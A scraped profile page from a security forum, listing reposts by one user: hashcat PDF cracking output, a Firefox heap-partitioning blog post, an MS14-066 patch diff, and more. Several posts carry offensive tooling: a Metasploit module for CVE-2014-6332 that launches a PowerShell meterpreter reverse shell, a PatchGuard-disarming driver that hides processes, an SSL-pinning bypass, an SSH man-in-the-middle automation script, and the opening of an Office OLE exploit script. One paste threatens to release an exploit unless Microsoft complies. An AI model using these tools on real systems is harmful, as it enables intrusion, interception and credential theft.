-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Cracking password protected PDF documents We just started with the work on oclHashcat to support cracking of password protected PDF. There is 5-6 different versions but for PDF version 1.1 - 1.3, which uses RC4-40 (and we have a fast rc4 cracking kernel), we can already summarize: Guarantee to crack every password protected PDF of format v1.1 - v1.3 regardless of the password used All existing documents at once as there's no more salt involved after the key is computed In less than 4 hours (single GPU)!! Here's how the output looks like: root@et:~/oclHashcat-1.32# ./oclHashcat64.bin -w3 -m 10410 hash -a 3 ?b?b?b?b?b oclHashcat v1.32 starting... Device #1: Tahiti, 3022MB, 1000Mhz, 32MCU Device #2: Tahiti, 3022MB, 1000Mhz, 32MCU Device #3: Tahiti, 3022MB, 1000Mhz, 32MCU Hashes: 1 hashes; 1 unique digests, 1 unique salts Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes Applicable Optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt * Brute-Force Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 80c Device #1: Kernel ./amd/m10410_a3.cl (21164 bytes) Device #1: Kernel ./amd/markov_le_v1.cl (9208 bytes) Device #1: Kernel ./amd/bzero.cl (887 bytes) Device #2: Kernel ./amd/m10410_a3.cl (21164 bytes) Device #2: Kernel ./amd/markov_le_v1.cl (9208 bytes) Device #2: Kernel ./amd/bzero.cl (887 bytes) Device #3: Kernel ./amd/m10410_a3.cl (21164 bytes) Device #3: Kernel ./amd/markov_le_v1.cl (9208 bytes) Device #3: Kernel ./amd/bzero.cl (887 bytes) $pdf$1*2*40*-4*1*16*c015cff8dbf99345ac91c84a45667784*32*1f300cd939dd5cf0920c787f12d16be22205e?55a5bec5c9c6d563ab4fd0770d7*32*9a1156c38ab8177598d1608df7d7e340ae639679bd66bc4cd?a9bc9a4eedeb170:$HEX[db34433720] Session.Name...: oclHashcat Status.........: Cracked Input.Mode.....: Mask (?b?b?b?b? [5] Hash.Target....: $pdf$1*2*40*-4*1*16*c015cff8dbf99345ac91c84a45667784*32*1f300cd939dd5cf0920c787f12d16be22205e?55a5bec5c9c6d563ab4fd0770d7*32*9a1156c38ab8177598d1608df7d7e340ae639679bd66bc4cd?a9bc9a4eedeb170 Hash.Type......: PDF 1.3 (Acrobat 2, 3, 4) + collider-mode #1 Time.Started...: Fri Nov 7 16:05:44 2014 (19 mins, 42 secs) Speed.GPU.#1...: 85019.7 kH/s Speed.GPU.#2...: 85010.9 kH/s Speed.GPU.#3...: 84962.4 kH/s Speed.GPU.#*...: 255.0 MH/s Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.......: 301050363904/1099511627776 (27.38%) Skipped........: 0/301050363904 (0.00%) Rejected.......: 0/301050363904 (0.00%) HWMon.GPU.#1...: 99% Util, 38c Temp, 25% Fan HWMon.GPU.#2...: 99% Util, 39c Temp, 27% Fan HWMon.GPU.#3...: 99% Util, 38c Temp, 27% Fan Started: Fri Nov 7 16:05:44 2014 Stopped: Fri Nov 7 16:25:29 2014 Sursa: https://hashcat.net/forum/thread-3818.html
-
Partitioned heap in Firefox, part 1 Published 15 Oct 2014 This post is meant to share some of the progress I’ve made in my current project at Mozilla, which I’ve been working on for about two months now. In short, the goal of this project is to use heap partitioning as a countermeasure for attacks based on use-after-free bugs, and in what follows, I’ll (briefly) go over what we’re trying to guard against, then proceed to explain what we’re planning to do about it. Use-after-free bugs and how they’re exploited Having very little security experience prior to taking this project, the first thing I did was spend a few days understanding how use-after-free bugs are exploited. As it turns out, they’re often an essential part of attacks against browsers, given how malicious Javascript code can get the browser engine to perform arbitrary allocations while being executed. In particular, if any script gets a chance to run after an object is freed, but before it is (mistakenly) used again, then that script could attempt to allocate, say, an ArrayBuffer in that free’d memory region. In a simplistic scenario, if that allocation succeeds – and, with a deterministic memory allocator, chances are it will succeed -, an attacker could overwrite the free’d object’s vtable to control the execution flow of the browser when a method of the compromised object is next invoked. While studying this, I found this description of a Firefox vulnerability found during Pwn2Own 2014 and this write-up on a WebKit exploit to be particularly useful. In the former, an ArrayBuffer is corrupted to leak some interesting memory addresses (thus bypassing Address Space Layout Randomization), which are then used to form a ROP payload that is entered after a jump is made to an address kept in memory that is used after being free’d. In the latter, a truly mindblowing sequence of steps is employed to overwrite the vtable of a free’d then used object. Heap partitioning as a countermeasure Attacks based on use-after-free bugs basically hinge on the predictability of the memory allocator: an attacker must be reasonably confident that triggering a memory allocation of the same size as a chunk of memory that was just free’d will cause the allocator to return that very same chunk. Thus, an effective way to counter these attacks is to partition the heap such that allocations that may be controlled by an attacker will never reuse memory that was previously allocated to internal browser objects. Specifically, Javascript objects that cause buffers to be allocated (and whose memory contents can be arbitrarily manipulated by an attacker), such as ArrayBuffers, should be allocated from an entirely separate memory pool than the rest of the browser engine. This approach has been implemented in other browsers tovarious extents, and Gecko already does partition a restricted set of objects, in addition to poisoning freed memory to help catch use-after-free bugs. However, despite being very effective, segregating entire classes of objects doesn’t come at no cost: there’s a very real risk of increasing memory fragmentation, and thus memory usage, which is something we’ve extensively tweaked in the past and care a lot about. A word on memory allocators After studying the available options, we came up with two alternatives for implementing heap partitioning – tweaking the existing allocator, or replacing it with Blink’s PartitionAlloc. Firefox currently uses an allocator dubbed mozjemalloc, a modified version of the jemalloc allocator. It is not too difficult to understand its inner workings by reading the code and stepping through some allocations with a debugger, but I also found a Phrack article about jemalloc to be a valuable resource. As a bonus, the article is written from an attacker’s perspective, which is good for “knowing-your-enemy” purposes. While it is not too hard to tweak mozjemalloc so it uses different partitions, we’re currently in the process of updating our allocator back to unmodified jemalloc (aka jemalloc3), so it’s more sensible to implement partitioning on top of jemalloc3 instead of mozjemalloc. Plus, jemalloc3 provides handy API calls that can be used for partitioning, which is less intrusive than what we’d need to do with mozjemalloc. PartitionAlloc (PA for short), on the other hand, is built from the ground up with partitioning in mind, and while it will certainly cause a lot more integration woes than jemalloc3, it’s definitely worth experimenting with. Given that it’s an off-the-shelf solution for partitioning, I haven’t bothered too much with understanding how it works yet, nor have I found any references about it aside from the code itself. Building up to the experiments After taking in all that new information, it became apparent that there was a lot of work to be done in both fronts – jemalloc3 and PA -, up until the milestone where we’d get some data to compare them and pick the winner. The JS engine folks advised me that the simplest way to get some experimental data for memory usage would be to not try to allocate specific objects in a separate partition, but rather to separate all engine allocations from the rest of the browser. Given that the buffers we’re interested in isolating account for most of the memory used by SpiderMonkey, this would give us a good approximation of the final results without having to worry too much about their hierarchy of memory functions. Thus, I spent the following weeks attempting to create two builds: one in which SpiderMonkey allocates from a separate jemalloc3 partition from the rest of Gecko, and another in which it allocates from PA, with jemalloc3 being used for the rest of Gecko. The latter may sound odd (that’s because it is), but it proved to be a lot easier than replacing the allocator for all of Gecko with PA, and I believe it is enough for comparison purposes. Additionally, I began working on the jemalloc3 transition by helping upstream some changes that had been made on mozjemalloc (bug 801536). As an interesting aside, the PA builds unveiled several violations of the JS engine API in which the memory allocators used by Gecko and SpiderMonkey were mixed (for instance, attempting to free from one of them memory that was allocated from the other), all over the code. I fixed all that I could find. Experiments We have a great tool for measuring Firefox’s memory footprint under realistic loads called Are We Slim Yet?, which I’ll refer to as AWSY for brevity. Once the necessary builds were ready, the next step was to run them through AWSY and see how they performed. [TABLE=class: img-wrap standout, width: 90%] [TR] [TD][/TD] [/TR] [TR] [TD=class: img-caption]— Columns, left to right: jemalloc3 with partition, mozjemalloc, jemalloc3 without partition, PartitionAlloc + jemalloc3 Frankenbuild[/TD] [/TR] [TR] [/TR] [/TABLE] The graph above shows RSS, the main metric we’re interested in – the amount of physical memory used by Firefox – in four different builds. From left to right: jemalloc3 with a separate partition for SpiderMonkey, an unmodified build using mozjemalloc, jemalloc3 without a separate partition, and jemalloc3 with PartitionAlloc for SpiderMonkey . The complete AWSY run has all the results, but it also shows pretty obviously that the in-browser memory accounting is broken with PartitionAlloc, so it’s best to constrain our analysis to RSS. Conclusions and next steps Despite the iffiness of the jemalloc3 + PartitionAlloc Frankenbuild, the experimental evidence shows that: 1. There’s no reason to expect PartitionAlloc’s memory footprint to be much better than jemalloc3’s 2. Partitioning jemalloc3 should introduce little additional memory overhead 3. jemalloc3 regresses significantly when compared with mozjemalloc Given the difficulty in integrating PartitionAlloc and conclusion 1 above, the takeaway is that the best way forward is to give up on PartitionAlloc for now and invest in jemalloc3, which we’re more than halfway through in transitioning to anyway. Of course, should our jemalloc3 solution prove insufficient for any reason, we now also have evidence that PartitionAlloc is a worthy contender in the future. Conclusion 2 gives us some confidence that going with jemalloc3 will not cause Firefox’s memory usage to skyrocket, but point 3, for which there is a known bug, is a bit more worrying, so I’ll investigate that next. Acknowledgements Special thanks to Daniel Veditz, Mike Hommey, Nicholas Nethercote, Terrence Cole, Steven Fink and John Schoenick for contributing to and guiding me through the various parts of these experiments. Sursa: might as well hack it | Partitioned heap in Firefox, part 1
-
CVE-2014-6332: it’s raining shells
Nytro posted a topic in Reverse engineering & exploit development
CVE-2014-6332: it’s raining shells This is a shared post by me (@wez3forsec) and Rik van Duijn (@rikvduijn) Today @yuange tweeted a proof of concept for CVE-2014-6223. CVE-2014-6332 is a critical Internet Explorer vulnerability that was patched with MS-14-064. The POC was able to execute the application notepad.exe. We wanted to pop some actual shells with this so now the race began to find a way of executing more than just notepad of calc. The “great” thing is this vulnerability affects Windows 95 IE 3.0 until Windows 10 IE 11 from a pentesters perspective this is awesome from a blue team perspective this will make you cry. CVE-2014-6332 alliedve.htm 404???? allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. — yuange @yuange75) 12 november 2014 We wanted to pop shells that’s why we created a Metasploit module, this allows us to adapt our exploit when needed and gives us the usability of the Metasploit framework. This gives the ability to start lots of different payloads supported by the Metasploit framework. To start the payloads, we decided to use Powershell. This has some advantages, Powershell is for example useful for bypassing anti-virus software, because it is able to inject payloads directly into memory. Next to this using newer versions of Windows we were unable to even run cmd.exe or other commands like ipconfig. Fun fact application whitelisting usually whitelists Powershell so use more Powershell! The original exploit runs the notepad.exe file in order to prove it was able to execute code. We modified this in order to execute the powershell.exe and inject a meterpreter into memory. First we modified the HTML page so its easy to handle within ruby, next we added the powershell.exe In order to see if it would actually execute. def on_request_uri(cli, request) payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true }) payl.slice! "powershell.exe " the above code generates a complete powershell one liner for a payload we are using a reverse_tcp meterpreter shell but it could use something else. function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1 end function The magic runmumaa() function, after safe mode is disabled this function is called and the actual shell is executed using the earlier generated Powershell payload. In the short time available to us we were unable to figure out how the exploit actually works the function setnotsafemode() seems to do the heavy lifting. Let’s see if we are able to pop a shell shall we? First we set up our exploit, we added our module to the path: /usr/share/metasploit-framework modules/exploit/windows/browser/ folder using name: ms14_064_ie_olerce .rb. The module has various options which need to be configured, as stated earlier we used a reverse_tcp meterpreter payload. Next we started our handler and using internet explorer navigated to the url, we see a quick popup from powershell but this disappears quickly. Checking Netstat we see a connection to port 80 from the process “system” to our Kali VM. Checking metasploit we see we have gained a shell and are now able to execute system command’s maybe try out that fancy new privilege escalation exploit (exploit/windows/local/ms14_058_track_popup_menu) and use Mimikatz to read passwords in plaintext J. Remember this is a quick and dirty POC Metasploit dev’s are probably yelling at their screens telling us how this is not how to build a proper module. They are right! But it works and with some work this could be a full-fledged Metasploit module. The Metasploit module can be found here: ms14_064_ie_olerce.rb Please note: make sure to have the latest Metasploit installed. For more details about the vulnerability: IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows Sursa: https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/ -
DisPG This is proof-of-concept code to encourage security researchers to examine PatchGuard more by showing actual code that disables PatchGuard at runtime. It does following things: disarms PatchGuard on certain patch versions of XP SP2, Vista SP2, 7 SP1 and 8.1 at run-time. disables Driver Signing Enforcement and allows you to install an arbitrary unsigned driver so that you can examine the x64 kernel using kernel patch techniques if you need. hide processes whose names start with 'rk' to demonstrate that PatchGuard is being disarmed. See NOTE.md for implementation details. Demo This is how it is supposed to work. Installation Configuring x64 Win8.1 Install x64 Win8.1 (editions should not matter). Using a virtual machine is strongly recommended. Apply all Windows Updates. Enable test signing. Launch a command prompt with Administrator privilege. Execute following commands. > bcdedit /copy {current} /d "Test Signing Mode" The entry was successfully copied to {xxxx}. > bcdedit /set {xxxx} TESTSIGNING ON [*]Copy the \x64\Release folder to the test box (a location should not matter). [*]Shutdown Windows. [*](Optional) Take a snapshot if you are using a VM. Getting Ready for Execution Boot Windows in "Test Signing Mode" mode. Execute Dbgview with Administrator privilege and enable Capture Kernel. Executing and Monitoring Run DisPGLoader.exe with Administrator privilege and internet connection so that it can download debug symbols. You should see following messages. FFFFF8030A2F8D10 : ntoskrnl!ExAcquireResourceSharedLite ... Loading the driver succeeded. Press any key to continue . . . And also should see following messages in DebugView. [ 4: 58] Initialize : Starting DisPG. [ 4: 58] Initialize : PatchGuard has been disarmed. [ 4: 58] Initialize : Hiding processes has been enabled. [ 4: 58] Initialize : Driver Signing Enforcement has been disabled. [ 4: 58] Initialize : Enjoy freedom [ 4: 10c] PatchGuard xxxxxxxxxxxxxxxx : blahblahblah. [ 4: 10c] PatchGuard yyyyyyyyyyyyyyyy : blahblahblah. Each output with 'PatchGuard' shows execution of validation by PatchGuard, yet none of them should cause BSOD because it has been disarmed. xxxxxxxxxxxxxxxx and yyyyyyyyyyyyyyyy are addresses of PatchGuard contexts. It may or may not change each time, but after rebooting Windows, you will see different patterns as most of random factors are decided at the boot time. Note that you will see different output when you run the code on Windows 7, Vista and XP because an implementation of disarming code for them is completely different. (Optional) Start any process whose name starts with 'rk' and confirm that they are not listed in Task Manager or something similar tools. (Optional) Keep Windows running at least 30 minutes to confirm PatchGuard was really disabled. When you reboot Windows, DisPG will not be reloaded automatically. Uninstallation It cannot be stopped and removed at runtime as it is just concept code. In order to uninstall DIsPG, you can reboot Windows and simply delete all files you copied. Tested Platforms Windows 8.1 x64 (ntoskrnl.exe versions: 17085, 17041, 16452) Windows 7 SP1 x64 (ntoskrnl.exe versions: 18409, 18247) Windows Vista SP2 x64 (ntoskrnl.exe versions: 18881) Windows XP SP2 x64 (ntoskrnl.exe versions: 5138) License This software is released under the MIT License, see LICENSE. Sursa: https://github.com/tandasat/PgResarch/tree/master/DisPG
-
Windows Phone security sandbox survives Pwn2Own unscathed Microsoft phone coughs up cookies, but full compromise fails. by Dan Goodin - Nov 13 2014, 5:20pm GTBST Microsoft's Windows Phone emerged only partially scathed from this year's Mobile Pwn2Own hacking competition after a contestant failed to fully pierce its defenses. A blog post from Hewlett-Packard, whose Zero Day Initiative organizes the contest, provided only sparse details. Nonetheless, the account appeared to show Windows phone largely surviving. An HP official wrote: First, Nico Joly—who refined his competition entry on the very laptop he won at this spring’s Pwn2Own in Vancouver as part of the VUPEN team—was the sole competitor to take on Windows Phone (the Lumia 1520) this year, entering with an exploit aimed at the browser. He was successfully able to exfiltrate the cookie database; however, the sandbox held and he was unable to gain full control of the system. No further details were immediately available. HP promised to provide more color about hacks throughout the two-day contest in the coming weeks, presumably after companies have released patches. The Windows Phone attack came during day two of the mobile hacking contest. During day one, an iPhone 5S, Samsung Galaxy S5, LG Nexus 5, and Amazon Fire Phone were all fully hijacked. More details are here. Sursa: Windows Phone security sandbox survives Pwn2Own unscathed | Ars Technica
-
This Is How ATMs Get Hacked in Russia: Using Explosives Jamie CondliffeFiled to: security Forget super-skinny card skimmers and clever malware attacks. In Russia, many of the attempts to illegally obtain cash from ATMs are rather more crude—because they involve explosives. English Russia points out that more than 20 Russian ATMS have been blown up recently in an attempt to steal money. The site reports that criminals pump the cash dispensers with propane, which they then ignite—in the process tearing the machines apart with brute force. The explosions can send debris up to 50 meters from the ATM. It clearly works: the perpetrators typically make off with 2,500,000 Rubles, or around $50,000, at a time. [English Russia] Sursa: This Is How ATMs Get Hacked in Russia: Using Explosives
-
MS14-066 schannel.dll diff (Windows 2003 SP2) @@ -29399,13 +29399,13 @@ int __stdcall SPVerifySignature(HCRYPTPROV hProv, int a2, ALG_ID Algid, BYTE *pbData, DWORD dwDataLen, BYTE *pbEncoded, DWORD cbEncoded, int a8) { signed int v8; // esi@4 - BOOL v9; // eax@8 + BOOL v9; // eax@9 DWORD v10; // eax@14 - DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@11 + DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@13 HCRYPTKEY phKey; // [sp+10h] [bp-38h]@1 HCRYPTHASH phHash; // [sp+14h] [bp-34h]@1 BYTE *pbSignature; // [sp+18h] [bp-30h]@1 - char pvStructInfo; // [sp+1Ch] [bp-2Ch]@11 + char pvStructInfo; // [sp+1Ch] [bp-2Ch]@13 phKey = 0; phHash = 0; @@ -29416,39 +29416,40 @@ if ( !pbSignature ) { v8 = -2146893056; - goto LABEL_18; + goto LABEL_20; } - if ( !CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) - || !CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) - goto LABEL_12; - v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); - if ( !v9 ) - goto LABEL_12; - if ( *(_DWORD *)(*(_DWORD *)a2 + 4) == 8704 ) + if ( CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) + && CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) { - pcbStructInfo = 40; - if ( !CryptDecodeObject(1u, (LPCSTR)0x28, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) + v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); + if ( v9 ) { -LABEL_12: - GetLastError(); - v8 = 3; - goto LABEL_18; + if ( *(_DWORD *)(*(_DWORD *)a2 + 4) != 8704 ) + { + ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); +LABEL_18: + v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391; + goto LABEL_20; + } + pcbStructInfo = 40; + if ( CryptDecodeObject(1u, (LPCSTR)0x28, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) + { + v10 = pcbStructInfo; + if ( pcbStructInfo > cbEncoded ) + goto LABEL_15; + qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); + cbEncoded = v10; + goto LABEL_18; + } } - v10 = pcbStructInfo; - qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); - cbEncoded = v10; } - else - { - ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); - } - v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391; - } - else - { - v8 = -1; + GetLastError(); +LABEL_15: + v8 = 3; + goto LABEL_20; } -LABEL_18: + v8 = -1; +LABEL_20: if ( phKey ) CryptDestroyKey(phKey); if ( phHash ) @@ -29458,7 +29459,7 @@ return v8; } Sursa: https://gist.github.com/hmoore-r7/01a2940edba33f19dec3
-
# I need a good doxbin onion back! Software SUCKS! Calling out "SChannel Shenanigans" Part one of the in depth story of MS14-666 / CVE-2014-6321 So, about those "SChannel Shenanigans"... Sit down and let me set the record straight! This is the story of the most under-played Patch Tuesday update ever delivered. The "SChannel Shenanigans" bug is a once in a lifetime type of vulnerability, and Microsoft is mis-representing the scope and severity of this defect. This is also the story of an opportunity lost by indecision; Learn from my fail! And while software sucks, you can mitigate harsh reality with defense in depth and consistent care. Yes, this vulnerability must be called "SChannel Shenanigans" or the wrath of "The Exploit" be upon you and your house! Some background to understand this discussion: def Lsa...() { } ^- This is easy code like for a "Function or Method Definition", or said another way, 'the instructions the computer carries out'. From here simply called "Methods". Attack surface and call graph describes how complicated, and how frequently a particular function may be called. The more complicated or prominently used the code, the larger the attack surface is. The more frequently a function is called, the larger the risk it carries if compromised. From here simply called "Surface". Privileges and capabilities are the "keys" the vulnerable process carries, which in turn can be stolen and used for more attacks if that process is compromised. These privileges, as held by Operating System and Platform Services processes and methods, are what give you access to everything: data stored, transmitted, remote service or networks, everything. From here simply referred to as "Privs" for short. What makes "SChannel Shenanigans" so dangerous? A number of things, combined, make this defect exceptionally dangerous to everyone running Windows 2000 and newer. As hinted at with first vulnerable version, the code affected is very old and very complicated. Old code with very large Surface explains the first aspect of risk. Next is the remote exposure of the huge Surface to attackers who may remain anonymous. This impact at a distance before verifying credentials or permitting access is the second aspect of risk. Finally, the frequent and pervasive use of the vulnerable Lsa Methods in all versions of affected Windows mean there are many avenues to 100% success of SYSTEM Privs. Sometimes called "God Mode" exploits when utilized to take over systems. It is as if our story code had been written like: < inside vulnerable SYSTEM Services > . def SYSTEM/AdministratorMainLoop() { while always { runService(); handleEvents(); } } def runService() { while always { contactRemoteServiceMaybe(); // calls vulnerable Lsa Method handleLocalRequestMaybe(); // calls vulnerable Lsa Method } } def handleEvents() { while always { acceptShadyInputsFromStrangers(); // calls vulnerable Lsa Method passThroughShadyToOthers(); // calls vulnerable Lsa Method } } . . . < inside vulnerable applications > . def insideEveryApplicationOnWindows() { doAnyCryptoStuff(); // calls vulnerable Lsa Method may be sandbox/restricted - doChain(); } . Exploits through remote services like RDP, IIS, ActiveDirectoy(LDAP), MSSQL, are pivots to rest of your critical infrastructure. Exploits through event handling yield Privs. Exploits through least privileged sand boxed processes can in turn incur Lsa Method calls in processes with Privs, including guest virtual machines on Windows host running VMWare or VirtualBox. In every way, this was one of those rare vulnerabilities in just the right place, giving a "God Mode" so effective you begin to question your own sanity. Thus when tracing through a confirmed exploitable call to the vulnerable Lsa Method, and another, and another, it begins to dawn on me just how dangerous this exploit is. It cannot be sold, without falling into wrong hands. It cannot be Full Disclosure'd, without creating pandemonium. It cannot be used without the utmost caution, lest it be stolen by an observer. In fact, talking about it makes me nervous, so let's just call it "The Exploit" and you are sworn to secrecy until we... Well, what the hell do we do with it? Sadly, this is as far as we'll get in the background portion of the first part of our tale. To sum up each amplifying risk factor for "SChannel Shenanigans": a.) Before authentication. Methods called early on in many, many applications and libraries and services. Surface exposed to any attackers, and early. b.) Always results in SYSTEM Privs, local or remote. A "God Mode" exploit with 100% success. c.) Multiplicity of use and high exposure of flawed code. Huge Surface; everything including Windows 2000 onward is vulnerable. d.) Legacy code carried onward, forever. This means modern protections that make exploiting Methods more difficult are not applied here. No EMET for you here, foolish Earth Human! And finally, an ultimatum or two. I did not know what to do with this before, but I do know what to do now given Microsoft's response to these defects. Microsoft has until the end of day Friday the 14th to change MS14-066 Exploit-ability Assessment to "0- Exploitation Detected". If they do not, I will anonymously distribute "The Exploit". Microsoft has until this time next month December 16th to release a patch for legacy XP customers also affected by this vulnerability. Additional time is granted given the overhead of build and test for a new platform on short notice. TL;DR: - Pre-auth remote exec and local Priv escalate in SChannel by 1 or more from year 2011 onward. - Every organization should run a Secure Drop for hot defect reports. - Microsoft owes their customers full disclosure and accurate risk guidance for MS14-066. - Microsoft owes XP legacy users a proper fix, too. With same four new cipher suites. - Assume all software is vulnerable, defend with depth and know how to recover. Langsec Coreboot Qubes FTW! P.S. Some of you may be skeptical; that's fine. I know all about you, my dear #infosec. The following code cleaned versions of Win2K sources listed are sha256sum hashed and as follows: private/security/schannel/lsa/bullet.c private/security/schannel/lsa/callback.c private/security/schannel/lsa/credapi.c private/security/schannel/lsa/ctxtapi.c private/security/schannel/lsa/ctxtattr.c private/security/schannel/lsa/debug.c private/security/schannel/lsa/events.c private/security/schannel/lsa/init.c private/security/schannel/lsa/libmain.c private/security/schannel/lsa/mapper.c private/security/schannel/lsa/package.c private/security/schannel/lsa/spreg.c private/security/schannel/lsa/stubs.c private/security/schannel/lsa/userctxt.c private/security/schannel/lsa/usermode.c private/security/schannel/spbase/asn1enc.c private/security/schannel/spbase/cache.c private/security/schannel/spbase/capi.c private/security/schannel/spbase/cert.c private/security/schannel/spbase/certmap.c private/security/schannel/spbase/ciphfort.c private/security/schannel/spbase/cliprot.c private/security/schannel/spbase/context.c private/security/schannel/spbase/cred.c private/security/schannel/spbase/debug.c private/security/schannel/spbase/defcreds.c private/security/schannel/spbase/keyxfort.c private/security/schannel/spbase/keyxmsdh.c private/security/schannel/spbase/keyxmspk.c private/security/schannel/spbase/oidenc.c private/security/schannel/spbase/pct1cli.c private/security/schannel/spbase/pct1msg.c private/security/schannel/spbase/pct1pckl.c private/security/schannel/spbase/pct1srv.c private/security/schannel/spbase/protutil.c private/security/schannel/spbase/rng.c private/security/schannel/spbase/sigfort.c private/security/schannel/spbase/sigsys.c private/security/schannel/spbase/specmap.c private/security/schannel/spbase/srvprot.c private/security/schannel/spbase/ssl2cli.c private/security/schannel/spbase/ssl2msg.c private/security/schannel/spbase/ssl2pkl.c private/security/schannel/spbase/ssl2srv.c private/security/schannel/spbase/ssl3.c private/security/schannel/spbase/ssl3key.c private/security/schannel/spbase/ssl3msg.c private/security/schannel/spbase/tls1key.c private/security/schannel/utillib/enc.c private/security/schannel/utillib/keys.c private/security/schannel/utillib/test.c private/security/schannel/pkiutil/pkialloc.cpp private/security/schannel/pkiutil/pkiasn1.cpp Please, for your own sake, don't call my bluff Microsoft! Sursa: SChannelShenanigans - Pastebin.com
-
Android-SSL-TrustKiller Blackbox tool to bypass SSL certificate pinning for most applications running on a device. Description This tool leverages Cydia Substrate to hook various methods in order to bypass certificate pinning by accepting any SSL certificate. Usage Ensure that Cydia Substrate has been deployed on your test device. The installer requires a rooted device and can be found on the Google Play store at https://play.google.com/store/apps/details?id=com.saurik.substrate&hl=en Download the pre-compiled APK available at https://github.com/iSECPartners/Android-SSL-TrustKiller/releases Install the APK package on the device: adb install Android-SSL-TrustKiller.apk Add the CA certificate of your proxy tool to the device's trust store. Notes Use only on a test devices as anyone on the same network can intercept traffic from a number of applications including Google apps. This extension will soon be integrated into Introspy-Android (https://github.com/iSECPartners/Introspy-Android) in order to allow you to proxy only selected applications. License See ./LICENSE. Authors Marc Blanchou Sursa: https://github.com/iSECPartners/Android-SSL-TrustKiller
-
@Ganav
-
Automating Man-in-the-Middle SSHv2 attacks Recently during an internal penetration test, I was performing ARP spoofing and i found a SSH connection from the administrator computer to another box. That sounds like the correct way to access remote hosts securely. However, the problem here was that the company was using a network switch that was vulnerable to ARP spoofing. I came across the below article about performing ARP spoofing and MITM SSH connections to steal credentials. The victim does get an alert message saying that there is a key mismatch but most people just ignore them anyway. SSH2 "MITM" like attack with JMITM2 | woFF In the article, he uses a software called JMITM2 (david-guembel.de: jmitm2) which is sort of like a honey pot that proxies SSH connections between the victim and the target SSH server. However, there are a number of steps to be done manually to execute this attack during an internal penetration test. 1. Check if network is vulnerable to ARP spoofing 2. Check if there are any active SSH connections in the network 2. Identify the victim computer and SSH server 3. Modify the configuration files of JMITM2 4. Modifying iptables 5. ARP spoofing 6. Checking JMITM2 console for credentials 7. Re-arp the router and victim host with the correct MAC addresses of each. It would save a great amount of time to automate these steps. I wrote a script that does just that. Running the command below checks the network for active SSH connections (via ARP spoofing) and then automates the whole attack to outputs any credentials captured to the console. python2.7 mitmSSH.py -analyze If you know the victim host IP and SSH server, you can use the below command python2.7 mitmSSH.py -host victims -ssh sshServerIP This script has only been tested on Kali Linux. There are a couple of things that are still in the works to improve the script. 1. Switching from intercepter-ng for ARP spoofing to scapy. The script can be grabbed from the below link https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py Sursa: Automating Man-in-the-Middle SSHv2 attacks | Milo2012's Security Blog
-
@giv
-
[h=1]MS Office 2007 and 2010 - OLE Arbitrary Command Execution[/h] # # Full exploit: http://www.exploit-db.com/sploits/35216.rar # #CVE-2014-6352 OLE Remote Code Execution #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com #Advanced Hacking Trainings - http://training.aslitsecurity.com #Web - http://www.aslitsecurity.com/ #Blog - http://www.aslitsecurity.blogspot.com/ #Tested on win7 - office 2007 and 2010. The exploit will not give UAC warning the user account is administrator. Else there will be a UAC warning. #No .inf file is required in this exploit #The size of executable payload should be less than 400kb #python 2.7 required #The folder "temp" should be in same dir as this python file. # usage - python.exe CVE-2014-6352.py (name of exe) #!/usr/bin/python import os import sys import shutil oleole = ( "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00\x06\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xFE\xFF\xFF\xFF\x00\x00\x00\x00" "\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00" "\x00\x00\x08\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" 